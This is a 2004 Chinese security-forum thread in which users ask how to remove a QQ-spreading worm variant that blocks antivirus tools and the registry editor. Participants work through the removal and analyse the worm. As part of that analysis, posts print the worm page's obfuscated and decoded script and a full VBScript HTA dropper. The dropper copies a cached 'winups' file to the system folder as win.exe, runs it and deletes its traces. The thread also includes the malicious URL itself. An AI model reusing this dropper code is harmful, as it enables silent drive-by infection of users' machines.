论坛: 病毒专区 标题: QQ尾巴病毒的变种,请高手! 复制本贴地址    
作者: anpow [anpow]    论坛用户   登录
QQ尾巴,会自动发送一个这样的网址“http://qiumei.3322.org/zhaopian/me.jpg ”,什么杀毒软件都开不了,注册表也打不开。在线杀毒的网页也开不了。能解决的就来,请喝酒!

地主 发表时间: 04-02-23 18:02

回复: flylight_0 [flylight_0]   论坛用户   登录
我的 也是这个问题
连任务管理器也开不了
网页链接中只要有关病毒杀毒的就点不开 文件夹只要有病毒两个字也打不开
改了名立刻打开!
注册表打不开

好邪门的毒啊
请大家解决一下
谢谢!


B1层 发表时间: 04-02-23 22:33

回复: jacky [jackypan]   论坛用户   登录
你们把注册表的文件名改一下,就可以打开了,再在注册表里去除注册项就好了


如还有问题,发邮件我 jackypan1984@126.com 我再看看

[此贴被 jacky(jackypan) 在 02月24日11时30分 编辑过]

B2层 发表时间: 04-02-24 11:29

回复: ghost619 [ghost619]   论坛用户   登录
学习一下

B3层 发表时间: 04-02-24 16:20

回复: bridex [bridex]   论坛用户   登录
用我的签名呀,流行病毒专杀工具。
一?我的签名,怎么安全站点广告了?
开个玩笑的。来这里www.google.com里
在收索栏里打 流行病毒专杀工具
找到后下载到机子里,然后运行它。
开始查毒,查杀后自动修复IE设置!


B4层 发表时间: 04-02-24 16:42

回复: bridex [bridex]   论坛用户   登录
http://www.spant.net/ http://freesoft.nease.net/spant/softs/Spant.exe



B5层 发表时间: 04-02-25 08:28

回复: ghame [ghame]   论坛用户   登录
我把这个网站的原码打出来,对解密我不在行,希望对网页加密熟的把它翻译过来。
<script language="JScript.Encode">#@~^xQEAAA==@#@&@!Z O@#@&\mD,AWMNdP{JYf;tYss]22]Z9Y!z]2Z8W[zu&3]Z9]ZbYf;W4%n1YY Z[mYCu&G] yhbUEa/ lkwY+y] ZA+botDYffZ]y!Ak[O4]ffu+!Z]f3u&Z&G(LnmDY22YZfu!bu&;r:T]+!kD^Y2f:H Lao]23Y!G]ZbY&/G(LnmDY ZNCOm]&9Yy 4+^sKRCkwu  u ZA+bo4Yu&9Tu !SrNDt]29Y Z!u&3]f/JW8L^Yu&3YZf]T)u&/z(G9XY22u!fu!zY&;z4YsVYfAJPJ&w!YPHG;D,mMk2YG~1W[+,OtDn@#@&0EU^DkGx,G!YAKD9`#@#@&P@#@&7l.P +AAKDNkI@#@&x+SAGD9/,'~EUnkmCwchKD[d*i@#@&[Km;:UDRAMkD+` +SAWMNd#p@#@&N,@#@&K;YSWD9cbi@#@&Jz~OR@*@#@&Qn4AAA==^#~@</script>

B6层 发表时间: 04-02-25 21:16

回复: jing_1460 [jing_1460]   论坛用户   登录
我把注册表的文件名改了但是还是不行啊,根本打不开  求助~~~

B7层 发表时间: 04-02-26 13:39

回复: flylight_0 [flylight_0]   论坛用户   登录
再顶一下
大家加油啊
怎么能让这种东西横行

B8层 发表时间: 04-02-26 19:41

回复: xiaohe616 [xiaohe616]   论坛用户   登录
解密后是这样的:

一次解密:
==============================================

<script language="JScript.Encode">
<!--
var words ="%3Chtml%3E%0D%0A%3Cbody%3E%0D%0A%3Cobject%20data%3D%22winups.asp%22%20weight%3D0%20width%3D%200%3E%3C/object%3E%0D%0A%3Cimg%20src%3Dmy.jpg%3E%0D%0A%3Cobject%20data%3D%22hello.asp%22%20weight%3D0%20width%3D%200%3E%3C/object%3E%0D%0A%3C/body%3E%0D%0A%3C/html%3E" //put your cripto code there
function outword()
{
var -ewwords;
newwords = unescape(words);
document.write(-ewwords);
}
outword();
// -->
</script>

===============================================

二次解密:


<script language="JScript.Encode">
<!--
var words ="<html>
<body>
<object data="winups.asp" weight=0 width= 0></object>
<img src=my.jpg>
<object data="hello.asp" weight=0 width= 0></object>
</body>
</html>" //put your cripto code there
function outword()
{
var -ewwords;
newwords = unescape(words);
document.write(-ewwords);
}
outword();
// -->
</script>



[此贴被 小克(xiaohe616) 在 02月26日23时11分 编辑过]

B9层 发表时间: 04-02-26 23:06

回复: 0045 [guang0701]   论坛用户   登录
到3721做下IE修复,挺方便的。

B10层 发表时间: 04-02-27 09:31

回复: cnyx [cnyx]   论坛用户   登录
该网页用了两次不同的加密算法,解密后的源代码如下:


var words ="<html>
<body>
<object data="winups.asp" weight=0 width= 0></object>
<img src=my.jpg>
<object data="hello.asp" weight=0 width= 0></object>
</body>
</html>" //put your cripto code there
function outword()
{
var -ewwords;
newwords = unescape(words);
document.write(-ewwords);
}
outword();
// -->
</script>
希望大家一起学习,交朋友的加我QQ:4800135

B11层 发表时间: 04-02-27 14:07

回复: piaoling [piaoling]   论坛用户   登录
没试过网上的尾巴专杀工具吗?
试试吧?
也许会有用。

B12层 发表时间: 04-02-27 20:58

回复: cxmcxm [cxmcxm]   论坛用户   登录
我也种了这个毒,你们说的都没用,除了上面所说的还有就是一切杀毒工具都打不开,在线杀毒的网站也一样!

B13层 发表时间: 04-02-27 21:17

回复: jing_1460 [jing_1460]   论坛用户   登录
我重做系统 都无法做,提示无法复制什么某文件啊 ,~!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

现在什么办法都没有用  qq专杀都打不开啊 ~

B14层 发表时间: 04-02-27 22:57

回复: cxmcxm [cxmcxm]   论坛用户   登录
我也是,在我能力范围内什么方法都用了也杀不了这个毒,我们一起顶到老大面前,老大出来帮帮忙呀!~~~~~~

B15层 发表时间: 04-02-27 23:29

回复: ghame [ghame]   论坛用户   登录
下面这里是网页中的hello.asp的源代码,VBSCRIPT的,里面提到在TEMP文件夹中搜索“winups”字样,如果找到,将它复制到你的系统文件夹中。你们先查一下本机中的winups有关文件,看有没有什么发现。网页源代码中的winups.asp和my.jpg在我截获的HTTP包头中都是JPG类型,我正在研究。
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<HTA:APPLICATION  caption="no" border="none" visiable="no" windowState="minimize" >
<script LaNGUAGE="VBScript">
window.moveTo  -100,-100
Set g_fs = CreateObject("Scripting.FileSystemObject")
Set tf = g_fs.CreateTextFile("c:\isp.hta",true)
tf.write "<HTA:APPLICATION  caption=" & CHR(34)& "no" & CHR(34)& " border=" & CHR(34)& "none" &

CHR(34)& " visiable=" & CHR(34)& "no" & CHR(34)& " showintaskbar=" & CHR(34)& "no" & CHR(34)& "

>" &chr(13)&chr(10)
tf.write "<object id='wsh' cl"&

chr(97)&"ssid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"&chr(13)&chr(10)
tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10)
tf.write "on error resume next"&chr(13)&chr(10)
tf.write "window.moveTo  -100,-100"&chr(13)&chr(10)
tf.write "window.resizeTo 0,0 "&chr(13)&chr(10)
tf.write "dim exepath"&chr(13)&chr(10)
tf.write "Function Search(objFolder) "&chr(13)&chr(10)
tf.write "Dim objSubFolder"&chr(13)&chr(10)
tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10)
tf.write "If InStr(1, objfile.name, " & CHR(34)& "winups" & CHR(34)& ", vbtextcompare)

then"&chr(13)&chr(10)
tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10)
tf.write "filecp.copy (exepath)"&chr(13)&chr(10)
tf.write "exit for"&chr(13)&chr(10)
tf.write "End If"&chr(13)&chr(10)
tf.write "Next "&chr(13)&chr(10)
tf.write "For Each objSubFolder in objFolder.SubFolders  "&chr(13)&chr(10)
tf.write "Search objSubFolder"&chr(13)&chr(10)
tf.write "Next"&chr(13)&chr(10)
tf.write "End Function"&chr(13)&chr(10)
tf.write "Set objg_fso = CreateObject(" & CHR(34)& "Scripting.FileSystemObject" & CHR(34)&

")"&chr(13)&chr(10)
tf.write "str=WSH.regread(" & CHR(34)&

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" &

CHR(34)& ")"&chr(13)&chr(10)
tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10)
tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10)
tf.write "exepath=othisfolder.path & "& chr(34) & "\win.exe" & chr(34) &chr(13)&chr(10)
tf.write "search tempfolder"&chr(13)&chr(10)
tf.write "wsh.run (exepath)"&chr(13)&chr(10)
tf.write "wsh.run " & CHR(34)& "command.com /c del c:\isp.hta" & CHR(34)& " ,0"&chr(13)&chr(10)
tf.write "window.close()"&chr(13)&chr(10)
tf.write "<" &chr(47)& "script>"&chr(13)&chr(10)
tf.close
wsh.run "c:\isp.hta",0
window.close ()
</script>

B16层 发表时间: 04-02-28 08:59

回复: ghame [ghame]   论坛用户   登录
我基本知道病毒的原理了,就是利用伪装成ASP文件的winups.exe来监控系统运行的进程,如果有REGEDIT.EXE,之类的就将它结束。
解决方法:
下载一个不出名的进程查看软件,杀掉这个进程。
我这里介绍一个DOS进程查看程序。
http://www.cnhonker.com/download/tools/Other/tools.rar
里面也有注册表修改的。

B17层 发表时间: 04-02-28 09:35

回复: ghame [ghame]   论坛用户   登录
忘了说了,winups.exe被复制到系统文件夹改名为win.exe,所以要杀的进程名应该是win.exe才对。

B18层 发表时间: 04-02-28 09:46

回复: shihaiyun [shihaiyun]   论坛用户   登录
我机子也是这样了,什么杀毒网页都打不开
杀毒工具都用不上啦


[此贴被 歌舞剧(shihaiyun) 在 02月28日13时39分 编辑过]

B19层 发表时间: 04-02-28 13:37

回复: cxmcxm [cxmcxm]   论坛用户   登录
呵呵,我终于把这个毒杀了,在C:\WINDOWS\system32下一个名叫(mz~~.exe).mz后面的~~~表示我忘了的英文字母,抱歉我这人很键忘!在安全模式下把它干掉就一切OK了!

B20层 发表时间: 04-02-28 14:05

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号